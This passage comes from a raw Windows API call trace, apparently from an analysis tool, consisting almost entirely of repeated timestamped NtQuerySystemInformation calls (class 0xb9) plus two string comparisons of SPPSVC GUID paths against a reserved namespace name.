ResultLength=0x0) [0231.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fceb0, Length=0x20, ResultLength=0x0) [0231.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.562] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x38, ResultLength=0x0) [0231.562] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.562] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x38, ResultLength=0x0) [0231.562] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcff0, Length=0x20, ResultLength=0x0) [0231.562] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x20, ResultLength=0x0) [0231.562] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x20, ResultLength=0x0) [0231.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd730, Length=0x20, ResultLength=0x0) [0231.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x50, ResultLength=0x0) [0231.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x50, ResultLength=0x0) [0231.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x50, ResultLength=0x0) [0231.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3a0, Length=0x50, ResultLength=0x0) [0231.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3a0, Length=0x50, ResultLength=0x0) [0231.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3a0, Length=0x50, ResultLength=0x0) [0231.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3a0, Length=0x50, ResultLength=0x0) [0231.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2d0, Length=0x38, ResultLength=0x0) [0231.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd100, Length=0x28, ResultLength=0x0) [0231.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd100, Length=0x28, ResultLength=0x0) [0231.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd100, Length=0x28, ResultLength=0x0) [0231.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x28, ResultLength=0x0) [0231.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2d0, Length=0x38, ResultLength=0x0) [0231.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x28, ResultLength=0x0) [0231.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x28, ResultLength=0x0) [0231.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2d0, Length=0x38, ResultLength=0x0) [0231.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x20, ResultLength=0x0) [0231.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0d0, Length=0x20, ResultLength=0x0) [0231.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0d0, Length=0x20, ResultLength=0x0) [0231.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0d0, Length=0x20, ResultLength=0x0) [0231.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2d0, Length=0x38, ResultLength=0x0) [0231.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x20, ResultLength=0x0) [0231.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0e0, Length=0x20, ResultLength=0x0) [0231.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0e0, Length=0x20, ResultLength=0x0) [0231.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x50, ResultLength=0x0) [0231.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x50, ResultLength=0x0) [0231.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x50, ResultLength=0x0) [0231.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3a0, Length=0x50, ResultLength=0x0) [0231.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3a0, Length=0x50, ResultLength=0x0) [0231.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3a0, Length=0x50, ResultLength=0x0) [0231.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3a0, Length=0x50, ResultLength=0x0) [0231.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2d0, Length=0x38, ResultLength=0x0) [0231.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd100, Length=0x28, ResultLength=0x0) [0231.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd100, Length=0x28, ResultLength=0x0) [0231.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd100, Length=0x28, ResultLength=0x0) [0231.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x28, ResultLength=0x0) [0231.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2d0, Length=0x38, ResultLength=0x0) [0231.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x28, ResultLength=0x0) [0231.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x28, ResultLength=0x0) [0231.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2d0, Length=0x38, ResultLength=0x0) [0231.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x20, ResultLength=0x0) [0231.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0d0, Length=0x20, ResultLength=0x0) [0231.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0d0, Length=0x20, ResultLength=0x0) [0231.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0d0, Length=0x20, ResultLength=0x0) [0231.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2d0, Length=0x38, ResultLength=0x0) [0231.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x20, ResultLength=0x0) [0231.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0e0, Length=0x20, ResultLength=0x0) [0231.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0e0, Length=0x20, ResultLength=0x0) [0231.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd560, Length=0x50, ResultLength=0x0) [0231.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4e0, Length=0x28, ResultLength=0x0) [0231.602] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0231.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd560, Length=0x50, ResultLength=0x0) [0231.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd560, Length=0x50, ResultLength=0x0) [0231.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd560, Length=0x50, ResultLength=0x0) [0231.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd490, Length=0x38, ResultLength=0x0) [0231.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2c0, Length=0x28, ResultLength=0x0) [0231.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2c0, Length=0x28, ResultLength=0x0) [0231.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2c0, Length=0x28, ResultLength=0x0) [0231.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd330, Length=0x28, ResultLength=0x0) [0231.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd490, Length=0x38, ResultLength=0x0) [0231.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3b0, Length=0x28, ResultLength=0x0) [0231.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3b0, Length=0x28, ResultLength=0x0) [0231.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd250, Length=0x20, ResultLength=0x0) [0231.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1d0, Length=0x20, ResultLength=0x0) [0231.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1d0, Length=0x20, ResultLength=0x0) [0231.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1d0, Length=0x20, ResultLength=0x0) [0231.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd490, Length=0x38, ResultLength=0x0) [0231.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd490, Length=0x38, ResultLength=0x0) [0231.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd310, Length=0x20, ResultLength=0x0) [0231.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2a0, Length=0x20, ResultLength=0x0) [0231.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2a0, Length=0x20, ResultLength=0x0) [0231.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd690, Length=0x40, ResultLength=0x0) [0231.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5f0, Length=0x40, ResultLength=0x0) [0231.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5f0, Length=0x40, ResultLength=0x0) [0231.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd510, Length=0x30, ResultLength=0x0) [0231.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd510, Length=0x30, ResultLength=0x0) [0231.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd418, Length=0x30, ResultLength=0x0) [0231.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd380, Length=0x38, ResultLength=0x0) [0231.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x50, ResultLength=0x0) [0231.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x28, ResultLength=0x0) [0231.619] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0231.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x50, ResultLength=0x0) [0231.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x50, ResultLength=0x0) [0231.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x50, 